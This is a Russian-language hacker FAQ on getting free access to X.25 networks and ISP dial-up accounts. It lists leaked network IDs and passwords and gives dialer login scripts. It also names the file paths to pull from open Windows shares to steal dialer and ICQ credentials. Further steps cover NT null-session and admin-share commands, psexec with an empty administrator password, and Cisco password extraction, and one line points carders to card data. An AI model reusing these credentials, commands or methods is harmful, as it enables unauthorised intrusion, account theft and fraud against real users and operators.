RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

X25 сети

PAD - то, на что вы звоните

NUI - network user identificator, то есть по-инетовски логин - штука, определяющая кто будет платить за соединение.

NUA - адрес в x.25 сети

Q: Слышал, что есть такие x.25 сети. Что это такое и зачем они нужны?

A: X.25 - это протокол, который применяется в так называемых сетях пакетной коммутации. Базируются такие сети на PAD’ах - Packet Assembler Disassembler. Таких PAD'ов много, и они разбросаны по всему миру. При подключении между падами устанавливается виртуальное соединение, по нему и происходит передача данных. X.25 сети интересны тем, что в них имеют выход многие крупные корпоративные сети. Здесь можно встретить локальные сети банков, аэропортов.

3.Как мне попасть из Ситы в Спринт? (и вообще из одной x.25 сети в другую)

В общем случае - только используя полную адресацию (то есть с DNIC-ом). Но я почти на 100% уверен что у вас этого не получится так как для этого надо иметь свой NUI, которому разрешен такой доступ (то есть всякие общедоступные или вообще их отсутствие тут не катит). Также можно через диалаут, имея при этом страшный гемор и убогую скорость. А о существовании мифических "адресов гейтов" из одной сети в другую я никогда не слышал, так что будем считать что их нет (а если и есть никто вам про них не скажет)

Сейчас вроде как люди не знают даже что такое адресация "с dnic'ом", для них вставим кусок старой доки:

формат адреса:

0 XXXX YYYY YYYY YY

0 - означает то что адрес задан в полной адресации

XXXX - DNIC, то есть код сети где первая цифра - код региона, вторая и третья - код страны, последняя - код сети в стране. Для России первые три цифры - 250,

 

Новости

20 бoлeзнeй oт кoта
Опасность вейпинга
Вpeднa ли coя жeнщинaм
Вcя пpавда o яйцаx
Вpaчи нaпoмнили o pискe зapaзиться гeпaтитoм в сaлoнaх кpaсoты
В кaкoе время сyтoк лyчше не лечиться
Tиxий чаc дважды в нeдeлю cнижаeт pиcк инфаpкта и инcульта в два pаза
Слaдкaя гaзиpoвкa вoздействyет нa opгaнизм
Почeмy витaминныe добaвки нe пpиноcят пользы
 

последняя же:

0 - ROSPAC

1 - SPRINT

2 - IASNET

3 - MMTLnet

4 - INFOTEL

6 - ROSNET

7 - ISTOK-K

8 - TRANSINFORM

YYYY YYYY YY - внутрисетевой адрес а еще для тех, кто не знает: сканирование x.25 сети - это последовательный перебор адресов, то есть nua. Его можно осуществить программами типа sprinter или ultra hack, ссылки кидать не буду - ищите ultra.zip или sprinter.zip note1. dnic ситы вроде бы 1116, во всяком случае таким его показывает умная железка фирмы cisco note2. подозреваю я что uunet есть тоже x.25 сеть с dnic 3132

4. А как мне достать NUI?

Общедоступную NUI можно выковорить из всяких там программ доступа к сетям через x.25, например WinCIM, посмотрев на их скрипты или на то, что они передают в порт. Нормальные же NUI можно достать или их покупкой, или как-нибудь спереть их у юзера, например сниффингом сети

5. А что такое сниффинг x.25 сети?

Это перехват ввода другого пользователя. PAD'ы как и другие узлы, имеют свои адреса а значит к ним можно попробовать подключиться. Это возможно не во всех сетях, а там где возможно - поиск таких адресов везде различен. Давным-давно сниффинг в сите описал cyberlirik, а недавно в x25zine#2 graf описывает сниффинг в роснете. советую прочитать.

6a. А иногда программу доступа не дают просто так скачать

В таких случаях можно попробовать скачать программу с расшаренного диска юзера этой сети и у себя доводить ее до функциональности, запустив к примеру filemon и regmon и смотреть куда они обращаются в реестре/чего им не хватает из файлов. Я так доводил до функциональности несколько диалеров, заодно узнал в какой ветви реестра они хронят настройки...

7. Есть ли гейт inet->[любая x.25 сеть]?

В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети

без диалаута можно попасть например сюда:

telnet 194.186.138.131 (rol)

telnet uu.x25.net.ru (uunet)

telnet x25pad.autonet.net (autonet)

telnet lon.telnet.ja.net (janet)

telnet 192.156.137.139 2600 (вроде SITA)

telnet 194.67.8.161 8099 (SOVAMNET)

примечание. с момента прошлого выпуска прошло много времени а информацию эту я снова не проверял. Может быть эти гейты уже не пашут.

Часть 2. Некоторые x.25 сети поконкретнее...

a) UUNET

8. Есть ли в России прямые пулы uunet и их ppp-пулы?

Нету.

Аналогом "ppp-пула" uunet (точнее worldcom'а) можно считать хост wcdial с паролем

sr1p.hpf

или РОЛ со следующим скриптом:

proc main

waitfor "ogin:"

transmit "[email protected]^M"

waitfor "word:"

transmit "[email protected]^M"

endproc

только один хрен, почти все забанено 8a/ а как тогда туда попасть через х.25?

Это все написано на хосте uunet'a mwan. Но там описано не всё, да и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?

Итак:

через ROL, заюзав логин и пароль [email protected]

через ситу nua 2111855

через спринт nua 202202

через tymnet с мневмоникой CML05 (однако у нас это рубанули давно уже)

через ppp infonet с логином [email protected] (информация тут противоречива - с одной стороны сделав на циске sh us можно видеть людей сидящих таким образом а с другой - войти не получается)

через x.25 infonet ( waitfor "CENTER:" transmit "EURO" )

через sovamnet с nua 93106001133

через ppp equant все с тем же [email protected] и еще х. знает через что

И вообще, скрипты доступа почти через все сети мира =) есть в ихней звонилке, скачайте и смотрите.

9. Как достать uic и password?

Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL), а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)

Программа доступа для uunet называется phone access lookupИмеется и расшифровщик конфигов, написанный barvinok. Конфиг ее лежит в \progra~1\pal\pal.ini (или \progra~1\pal95\pal95.ini или... возможны варианты) после расшифровки получаем:

Info #0 : HostName=hpco

Info #1 : UserID=m00108415

Info #2 : Password=28Faz6m7

тогда как следующее - для ppp:

Info #0 : [email protected]

Info #1 : host_pw=28Faz6m7

Многие вот жалуются, что мол нету нигде этих pal.ini.

Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко. Основную массу я тягал с nt, так что думайте, как сканить... как примерно можно это сделать будет описано ниже, в разделе "разное" =) ссылочки: расшифровщик openpass

Многие могут сказать - да что мол, зачем сейчас эти уики все равно везде забанено всё. скажем так - во первых через жопу (второе ppp скажем) можно юзать и сейчас, во вторых они почему-то изредка разбаниваются ;) а в третьих ну вот говорят что agilent на РОЛе идет и по сей день...

10. Как мне использовать закрытые для России аккаунты worldcom?

Cуществует много вариаций, например:

1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.

Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).

А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet uu.x25.net.ru. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось.

2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.

например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)

updated. доюзались через грик - закрыли почти всё нахрен. уунет через рол теперь почти не юзается.

3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)

11. А как лучше сканить UUNET?

Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си (например uunetscan.narod.ru) или то же самое через nonblocking sockets (хрен знает есть ли такое)

12. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д

Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.

13. А я слышал, что можно коннектиться к compuserve через Петерлинк

У них на сайте лежат скрипты для WinCIM'а но я их не изучал и не собираюсь потому что думаю что ничего хорошего из этого не выйдет.

14. Как менять пароли на аккаунты worldcom'а?

Честно говоря, я уже не помню. У меня где-то было это записано . Если мне не изменяет память это было и еще что-то для другого типа акков. В любом случае куда копать я вам сказал. Кстати если пошустрить в диапазоне веб-серваков wcom.net сканером можно найти много интересного, например

vpnclients.wcom.net с софтом для доступа в VPN соответствующих компаний со всеми вытека-ющими последствиями. Вот кстати и второе правило исследования разных сетей - пробовать найти и заюзать все пользовательские сервисы, логиниться куда угодно, прошерстить все http а особенно https сервера...

б) Сита.

Кратенько - как начать работать с падом:

после дозвона необходимо задать тип терминала - передать .^M где ^M = enter. Вылезет

SITA network : xxxx xxx где xxxx xxx - адрес линии на которую дозвонились.

После этого надо задать NUI (без него не дадую никуда вылезти): nui xxxxxxxx

и после запроса ввести пароль. после этого вводим NUA и вперед.

15. Какие есть общедоступные Nui для ситы?

19730001/KHS9NE

16. Вот сижу я на сите и вдруг пакеты перестают ходить, а связь не рвется.

Происходит это оттого, что сеть слишком загружена. Несколько лет назад этого не было никогда, но и любителей халявы тогда было уж куда поменьше. По-моему единого решения этой проблемы не существует, но вот суждения высказанные разными людьми в разное время:

a) это зависит от используемого nui и nua (вполне возможно, ищите те которые никто не использует) а также от логина (а это уже бред)

б) от скорости соединения - чем ниже тем стабильнее. (не уверен, это помогает когда плохая линия связи а тут вряд ли поможет)

в) надо изменить размер входных и выходных пакетов. (вот это наиболее полезная по моему штука, для этого надо перед nua ставить конструкцию задающую их размер:

Line(xxx/xxx) yournua, например

Line(64/64) 9002167001

г) изменить параметры пада (даже кто-то приводил необходимые значения:

set 1:0,2:0,3:0,4:1,9:0,13:4,21:0 но это особо не помогает)

д) запустить Сеанс MS-DOS и там набрать:

ping -t uunet.x25.net.ru (этот хост для примера, можно использовать любой

другой). Смысл в том, чтобы пакеты шли постоянно. Тем самым вы резервируйте для себя чуть-чуть канала. Конечно, что-либо качать это мешает, но сидеть в IRC/ICQ - самое то.

Вобщем попробуйте эти способы и может вам это поможет.

17. Как по ситовскому nua определить местоположение?

формат адреса:

2 XX X YYY

XXX - код страны, например 270 - Россия.

18. Что можно использовать через ситу?

В сите есть адреса почти всех известных провайдеров которые все очень любят =)

Ну про адрес uunetа уже писали, ipass и equant - смотри ниже, грик-тоже ниже =)

в) Спринт.

как начать работать с падом: звоним на пул, далее необходимо задать количество битов/четность. Для 8N1 вводим @D^M получим запрос terminal= на который введем d1^M и ждем приглашение @D. Cюда вводим команды, или NUA. В данной сети как и во многих других к некоторым адресам можно подключаться без NUI, а при соединении с NUI формат команды будет nua,nui,nua_password

19. Что можно заюзать?

в спринте есть Nua через которые можно было использовать некоторые аккаунты equantа

(например [email protected] =)) и соответственно ipass через эквант (это сейчас

уже вряд ли). NUA:

031109671905100

76632343

031105721029100

031109601178000

031109671905100

кроме того конечно там есть nua gin'a, см. раздел про gin.

г) Роснет.

сразу после дозвона вылезет Welcome to ROSNET! и приглашение * -туда и вводим свой NUA. Через Роснет доступны только русские ресурсы поэтому там можно заюзать только ихние собственные логины (см. www.rosnet.ru) и MTU (см. ниже)

д) Cовамнет.

Что-то нонче интерес к совамнету поутих, раньше каждый день кто-то спрашивал про nui =)

Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25

Используется например для связи между всякими там банками Построено все это чудо на оборудовании Nortel Magellan Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,

и использовав логин и пароль x25:

sovam!login: x25

Password:

Trying 194.67.8.161, 8099 ... Open

SOVAMNET: 30130123

Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат команды как в сите (nui xxxxxxxx).

SOVAMNET: network user identifier xxxxxxxx active

Далее, вводим nua.

е) Тимнет.

честно говоря, не знаю что про эту сеть и сказать-то =) я через нее только уунетовские хосты использовал давным-давно. Скажу только что звонить надо с настройками 7e1 и в log in: писать мневмонику

Часть 3. Провайдеры, буржуйские и наши.

a) грик консорцыум

20. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?

Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами список всех провайдеров входящих в консорциум Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его можно через жопу - куда-нибудь позвонив, прислав им скан документа и т.д. Так что наверное можете уже и не искать. =) Грик как он был раньше уже не

работоспособен для нас можно сказать, через него можно использовать сейчас некие остатки уунета, фиберлинк и т.д.

21. Можно ли использовать аккаунты грика через x.25 сети?

Скрипт, лежавший одновременно и в гриковом, и в фиберлинковском диалере:

proc main

transmit "...^M"

waitfor "SITA NETWORK"

transmit "NUI xxxxxxxxx^M"

waitfor "password"

transmit "xxxxxx^M"

waitfor "active"

transmit "2124172001^M"

waitfor "connected"

endproc

б) equant

Забанено так же очнь много. До сих пор работают аккаунты нескольких компаний, а халявщики же основной упор делают на использование *.00.go - по моему разумению что-то вроде аналога корпоративных аккаунтов в ворлдкоме.

22. Как использовать аккаунты equant забаненые на прямых пулах?

Выбирайте nui из вышеприведенного списка ситовских, а нуа вот отсюда:

9002156001 2311021001 - ams

9002157001 2337528001 - par

9002158001 2498247001 - fra

9002159001 2126209001 - lax

9002160001 2151271001 - sea

9002161001 2112184001 - jre

9002167001 2811222001 - qxo

9002168001 2853167001 - hkg

9002169001 2616373001 - bwu

9002261001 2448678001 - lon

9003156001 2151271001 - ams

9003157001 2337528001 - par

9003158001 2498247001 - fra

9003159001 2126209001 - lax

9003160001 2151271001 - sea

9003161001 2112184001 - jre

9003167001 2811222001 - qxo

9003168001 2853167001 - hkg

9003169001 2616372001 - bwu

9003261001 2448672001 - lon

на сегодняшний день точно работают с этими nua nui 79900001 и 22421028

в) at&t, ibmnet

по этим вещам у меня информации не очень много, и уверенности в том что она правильная нету, но напишем что знаем.

23. Как использовать аккаунты AT&T?

23a) worldnet

обычные аккаунты типа [email protected] сейчас уже вроде как использовать не получится.

Раньше работало следующее:

Через пул:

proc main

transmit "*CLR

" waitfor "Please Sign-on:"

transmit "[email protected]^M"

waitfor "Password:"

transmit "569365964^M" - может быть любым.

waitfor "Please Sign-on:"

transmit "ваш аккаунт AT&T,ваш пароль AT&T"

waitfor "}"

endproc

Через INFONET:

proc main

waitfor "ogin:

" transmit "wvpn03*xwnet04^M"

waitfor "assword:"

transmit "wvpn03oz^M"

waitfor "connected"

transmit "^M"

endproc

скрипт через пул at&t очень похож на те которые сейчас используются на аккаунтах типа [email protected], про которые вы можете прочитать в статье vaio, взятой с deer.net.ru здесь ATT а логин/пасс для доступа к ppp через инфонет вроде тоже работает(или работал?) после бана

[email protected] так что пусть эта инфа останется, решил я. Про акки [email protected] я уже говорил где читать надо =)

23б) global network

аккаунты типа dualaccess.*.* , secureip.*.* да и вообще все кроме internet.*.* по умолчанию работают на наших пулах. а на аккаунтах internet.*.* по умолчанию нету роуминга только на 3 страны - Филиппины, Пакистан и конечно же Россия. По информации на сайте чтобы врубить роуминг надо позвонить в службу поддержки для

России, дается телефон в Голландии. Кто хочет звоните =) Кроме того, аккаунты с включенным роумингом можно найти на диапазонах где сидят российские юзеры =) p.s. когда копался в свойствах аккаунта на services.prserv.net там было manage your credit card, user information и т.д. я там особо не лазил, но возможно

там есть информация о кредитке владельца аккаунта - кардерам на заметку =)

г) GIN

на своем веб-сайте называют себя "русский эквант". И действительно что-то общее заметить легко ;) Имеют ppp-пулы а также доступны через Спринт со следующим скриптом лежащем на их сайте:

proc main

string szPassword

transmit "@D^M"

waitfor "TERMINAL=",matchcase until 7

transmit "^M"

waitfor "@",matchcase until 1

transmit "025017720101800^M"

endproc

Через gin работают аккаунты экванта типа *.00.* ,более того мне нередко встречались 00.ru которые являются русскими корпоративными аккаунтами. Обычные же юзеры имеют аккаунты типа @gin.ru @gin.by и типа того...

p.s. интересно если аккаунты екванта работают через джин то верно ли обратное? =) не пробовал никогда

д)ipass

честно говоря, рабочего аккаунта ipass который можно бы было использовать в России я уже не видел давно, но я в общем-то и не искал =) Раньше работало следующее:

-через equant,gric и еще х знает через что добавляя перед логином "IPASS/". например:

IPASS/000066638963044478010#[email protected]

-через ситу: nui 37830001 nua 9001252001 - это "родная" информация, тут возможны варианты.

а вот какие скрипты лежат в официальном хелпе ipass'а только я думаю у нас таких сетей не водится: IPASS

у них есть свой диалер, которым юзеры на роуминге любят пользоваться, называется

ipassconect, аккаунт лежит в \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем ipassconnect и юзаем openpass

е) инфонет

Имеется ppp-пул доступный для всей России 8w8002001234 (про toll free смотри ниже)

Инет довольно хороший и бодренький, однако тут тоже сказалась эпидемия отхватывания банов - на многие хорошие домены все чаще видишь NAS group unlisted =(

Аккаунты есть двух типов: user*обозначение_домена и user@domain Разницы между ними по моему особой нету, как написано в хелпе к диалеру первое - просто более старая форма записи, а вторая - более новая.

У них свой диалер dialxpressway, с которым лично я до конца не разобрался.

Аккауни лежит \progra~\infone~\dialxpressway <версия диалера>\data\accounts.username.ini или accesscodes.username.ini

Однако после скачивания файла возможны варианты:

[[email protected]]

P=8C001002010200000168000000A4000084C19015DC76D48CCA1F02BC25479F6D009A928149E2D3B48

7D11B12AE37A15A920C140AD2C459144FD4D7502C26D385A868CF3DA2B6452AD9D3401F01F4F4E00FD7

2FE0EF9F8D79747CE75A93161A0B687DE720D7EF4D598B98950C400F794634A7A94C1E5BDAB345E3DF6

BC1B4444555BF47F4E52A5E51D9885A289AED020007000000557F5072AAFB81

F=000000

R=rb

Пароль как я думаю вы уже догадались зашифрован в строчке P= так вот. Если первый байт =8 то при подкладывании конфига в свой диалер пароль появится в виде звездочек в нужном поле и остается только запустить openpass а если 4= то х...й - пароль не появится. На взгляд шифрованный пароль в таком виде короче:

[rstevens*cayto0m]

P=4C002002010200000168000000A40000539A4F5DD4008837248452194DCDD948DF73247E0B07CE46B

88434CC95AFFAE9F63B48607541E8E79A8D4AC3C234D8FAAB55EF960F25703C3FE3AA33FB1C02000800

000044837C6939F45E9B

F=000000

R=Standard

и я сделал вывод что ключ к расшифровке в этом случае хранится в реестре, и не находя его система не может расшифровать конфиг. поэтому надо еще и с реестром заморачиваться.

ё)МТУ

Московский провайдер МТУ-интел. Почему он столь любим нашими халявщиками - я не знаю но его любят поюзать все.

24. Можно ли использовать аккаунты МТУ не в Москве?

В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет. updated: появился и пул в Питере - 3801108

А еще есть один Роснетовский nua который правда работает вроде только для подмосковья 61106500004

Часть 4. Разное

25. А правда, что телефоны 8-800 бесплатные?

Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и прочая херь). Типа, шагаем в ногу с америкой (там 1-800 тоже free) Правда тут есть минус - если твой номер невозможно определить АТС тебя не пустит на междугороднюю линию и поэтому твой номер при таких звонках всегда определён. Поэтому счет не придет но могут придти серые люди.

26. Как установить второе ppp соединение под *nix?

нужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано

на примере, правда не pppd а ssh)

27. Есть у меня диалер для сети xxx. Как посмотреть какими командами он обменивается с пулом/выдрать скрипт/etc

Тут вариантов много. Например чтобы друг с терминалкой эмулировал пул и позвонить ему =) однако можно это все сделить просто и на одной машине используя драйвер виртуального модема, например COM/IP. Итак:

1) Ставим COM/IP с драйвером виртуального ком-порта и модема. Итак можно вместо звонков конектиться по ТСР

2). Запускаем что-нибудь на проспушивание какого-либо порта (в COM/IP по умолчанию

23), так, чтобы можно было руками вводить как бы "ответы" padа - например вполне сойдет nc

3)в звонилке ставим юзать com/ip virtual modem звоним на номер 127000000001 то есть подрубаемся к nc и осуществляем обмен данными =)

28. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?

Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa, или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:

* ivangovnov ([email protected]) has joined #usa то что нам и надо.

Правда оказывается даже после этого люди не могут найти эту галку =)

А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts

И еще. Люди спрашивают "как же мол whois". Так вот, с whoisа вы получите либо огромный диапазон который зае...тесь просканивать или там вообще не окажется ни одного диалапщика а только вебсервера какие-нибудь

29. Как узнать адреса DNS серверов для провайдера [kewlprovider]?

Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:

запускаем nslookup

говорим ей set type=ns

и после этого вводим домен для которого надо узнать адреса, например rosnet.ru

30. Вот сканерю я, а какие файлы обычно люди с шар тянут?

аськины uinы:

\progra~1\icq\2000a\??????.uin

\progra~1\icq\2000b\??????.uin и так далее

конфиги диалеров, например \windows\edialer.ini

\progra~1\ipass\ipassco~1\userpref.ini - ipass

\progra~1\ipass\ipassco~1\ipass.ini - ipass

\progra~1\at&t\wns\user\account.* - at&t dialer, как его там

конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно

обнаружить аккаунт на шелл

ну и про *.pwl и system.ini и так все знают

31. как найти dialout?

Вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012,

32. Какие есть пароли по умолчанию на всякие там роутеры?

вот некоторые из них (собранные вроде cyberliric'ом):

passw

а вообще надо просто почитать официальную документацию на интересующую железку, из нее и пароли узнаете и еще много интересного =)

33. А как находить расшаренные диски? у меня сканер ничего не находит

Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.

Чтобы правильно работал сканер надобно:

чтобы в свойствах соединения с инетом стояла галка "вход в сеть" и были установлены следующие компоненты:

протокол tcp/ip и "контроллер удаленного доступа" (естественно)

клиент для сетей microsoft

и (вроде бы) протокол NetBEUI хотя по-моему он как раз таки и не нужен

34. А некоторые диалеры типа GRICdial хранят всю информацию в реестре. Что делать?

Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра. Хотя я все-таки рекомендую посмотреть на размер реестра - если он не очень-то большой то лучше наверное все-таки его скачать

35. Теперь ветка win9x закрыта, выпускают только клоны NT. Как же сканировать?

Все распространенные сканеры не могут работать с WinNT машинами потому что там немного другая система доступа к расшаренному диску - допускать вас или нет определяется паролем на диск, а аккаунтом. Таким образом надо получить аккаунт на данной машине и потом уже пытаться получить доступ к диску.

Вкратце расскажу как сделать это руками:

-сначала надо определить имя пользователя. это можно сделать с помощью sid2user и user2sid. не знаю работает ли это на всяких там XP - я пишу про классическую NT4 с которой раньше часто имел дело =)

Не забывайте о стандартных аккаунтах. Юзера administrator не все переименовывают -посмотреть какие шары доступны.

net use \\ip\IPC$ "" /user:"" (или например уже тут использовать известный

аккаунт если он есть: net use \\ip\IPC$ "" /user:administrator) и сделать net view \\ip

минусы - не будут выведены шары у которых в имени на конце $

Не забывайте о стандартных NT шарах C$ D$ ADMIN$ =) -ну и собственно подключить диск (net use q: \\ip\C$ "password" /user:"login") и скачивать информацию.

примечание. sam и реестр так скачать не получится. придется ограничиться конфигами диалеров. Как теоретически выбить информацию из sam смотри в след. вопросе

36. Как поставить пандору на шелл?

Есть пандора под Linux. однако все почему-то предпочитают ставить её на NT. Следовательно надо получить привелегию исполнять команды на сервере. Кому-то тут может помочь старый добрый тупой уникодовский баг но я пользовался следующим - я уже писал что многие не отключают юзера administrator и пароль у

этого юзера пустой. Если зайти на www.sysinternals.com то можно найти такую штуку как psexec которая установится на том компе как сервис и позволит выполнить там любую команду. Поэтому пускаем

psexec \\ip -u administrator -p "" cmd и радуемся.

37. Нашел классного провайдера xxx аккаунты которого можно использовать через сервис yyy и где включать роуминг но его не дают включить =(

Нередко такие вещи как управление аккаунтом дают делать только со своих диапазонов. Поэтому надо найти телефон пула провайдера xxx, установить второе ppp соединение через dialout и врубить себе роуминг.

38. Как взломать cisco и взять у нее пароли от интернета?

Невозможно вот так взять и научить взломать cisco особенно если админ не дурак. Попробуйте найти аккаунт к ней, можно тупо попробовать cisco/cisco, если циска прова - заюзать его аккаунт, а авось бросят не в РРР сразу а в exec shell =) Далее надо получить необходимые привелегии чтобы посмотреть конфигурацию системы то есть войти в enable - 15ый уровень привелегий. Делают

это командой enable которая скорее всего вас обломает запросом password: =) Но если получится и приглашение роутера сменилось с router> на router# то пишем там sh runn и получаем текущую конфигурацию роутера. Пароли там могут лежать в нескольких видах:

username user password 0 k3wlpasS незашифрованном =)

username user password 7 105A1A1C070507 зашифрованным но обратимо.

Чтобы расшифровать это дело надо john'ом the ripper'ом

Но скорее всего пароли для доступа в интернет хранятся на радиус-сервере и аутентификация производится через радиус, тогда вы увидите:

ip radius source-interface Loopback0

tacacs-server host XXX.XXX.XXX.XXX

tacacs-server host XXX.XXX.XXX.XXX

tacacs-server timeout 40

tacacs-server directed-request no-truncate

tacacs-server key some fucking key

radius-server host XXX.XXX.XXX.XXX auth-port 1645 acct-port 1646 non-standard key #

some#fucking#key

и тогда вам уже придется имеь дело с радиусом. Еще естественно надо порыться в архивах всяких bugtraq'ов перед тем как =)

p.s. если в приграшении роутера набрать ? то он выведет все свои команды если набрать ? после команды он выдаст её параметры

ПРИЛОЖЭНИЭ. Очень часто люди спрашивают - какие диапазоны ip мол мне сканить?

и раньше мы пытались ответить на это и даже приклыдавали файл в котором содержались ip которые были на 80% откровенно херовыми и ненужными. Так что насчет ip диапазонов - ищите сами, спрашивайте друг у друга и т.д. Так что - бзз приложэний.

Q.Что такое SOVAMNET, дайте мне NUI и как оттуда выйти в УУНЕТ!!!

A.Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25

Используется например для связи между всякими там банками =) Построено все

это чудо на оборудовании Nortel Magellan

Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,

и использовав логин и пароль x25:

sovam!login: x25

Password:

Trying 194.67.8.161, 8099 ... Open

SOVAMNET: 30130123

Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат

команды как в сите (nui xxxxxxxx).

SOVAMNET: network user identifier xxxxxxxx active

Далее, по просьбам трудящихся попробуем выйти в uunet:

31102020020200

SOVAMNET: call cleared - temporary network problem

SOVAMNET: 30130123

Сканить эту сеть я не пробовал так что есть ли там что интересное - хуй знает.updated: как оказалось, в uunet можно выйти по nua 93106001133, в отличие от общеизвестных записанных с dnic'ом. причём там вроде как работает много из тех хостов, которые not allowed from this gateway в других местах.

Q. Через что возможен доступ в uunet?

A.Это можно узнать на все том же хосте уунета mwan.

Но там описано не всё, и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?

Итак:

через ROL:

proc main

waitfor "ogin:"

transmit "[email protected]^M"

waitfor "word:"

transmit "[email protected]^M"

waitfor "pen"

transmit "^M"

waitfor "ame:"

transmit $USERID, raw

transmit "^M"

waitfor "word:"

transmit $PASSWORD, raw

transmit "^M"

waitfor "~"

endproc

через sita network:

proc main

transmit "...^M"

waitfor "SITA"

transmit "nui 19730001^M"

waitfor "XXX"

transmit "khs9ne^M"

waitfor "active"

transmit "2111855^M"

waitfor "ame:"

transmit $USERID, raw

transmit "^M"

waitfor "word:"

transmit $PASSWORD, raw

transmit "^M"

waitfor "~"

endproc

через tymnet:

proc main

set port databits 7

set port parity even

transmit "^M"

waitfor "terminal"

transmit "A"

waitfor "log in"

transmit "CML05^M"

waitfor "ame:"

transmit $USERID, raw

transmit "^M"

waitfor "word:"

transmit $PASSWORD, raw

transmit "^M"

waitfor "}"

set port databits 8

set port parity none

endproc

Вставив это в свойства соединения, указываем логин и пароль в виде:

login: host_name,uic (например cnnint,kotp)

password : пароль (тут всё понятно)

для информации: в принципе пароль можно указывать и в виде

host_name,login\password . кроме того существуют и другие параметры вроде установки типа терминала

Кроме того, в уунет можно попатсть через спринт (nua 202202), раньше можно было через инфонет с логином и паролем [email protected] (как сейчас - не знаю) и еще хрен знает через что

updated: например через инфонет - вот кусочек сценария:

set port databits 7

set port parity even

transmit "^M"

transmit "^M"

transmit "^M"

waitfor "#"

transmit "C"

transmit "^M"

waitfor "CENTER:"

transmit "EURO"

transmit "^M"

waitfor "Host Name:

Однако следует различать пулы инфонета - есть x.25, а есть ppp. Это скрипт для

x.25 пула, а тот общеизвестный 8w800200.... - ppp, то есть там это не прокатит.

Q.А правда, что телефоны 8-800 бесплатные?

A.Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и пр.). Типа, шагаем в ногу с америкой (там 1-800 тоже free)

Q. А как лучше сканить UUNET?

A.Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си или то же самое через nonblocking sockets (хрен знает есть ли такое) - сканер uunet на си updated: а вот как сканили раньше... Скрипт morgoth'а, вечная ему память.

------- begin

; for scan CompuserveNetwork's hostnames

; v1.4 [email protected]

OPENREAD hosts.txt

SEARCH

start:

TRANSMIT "@D^M"

WAITFOR "TERMINAL=" , 20

TRANSMIT "d1^M"

WAITFOR "@" , 20

con:

TRANSMIT "202202E^M"

WAITFOR "Name:" , 20

con0:

TRANSMIT "%LOGIN%/new^M"

WAIT "Name:|UIC:|@|}|onnected to|assword:|error|not allowed" ,40

CHECK "Name:" , con1

CHECK "UIC:" , con2

CHECK "@" , con1

CHECK "}" , found

CHECK "onnected to" ,con6

CHECK "assword:" ,con5

CHECK "error" ,con6

CHECK "not allowed" ,con6

con1:

READRECORD

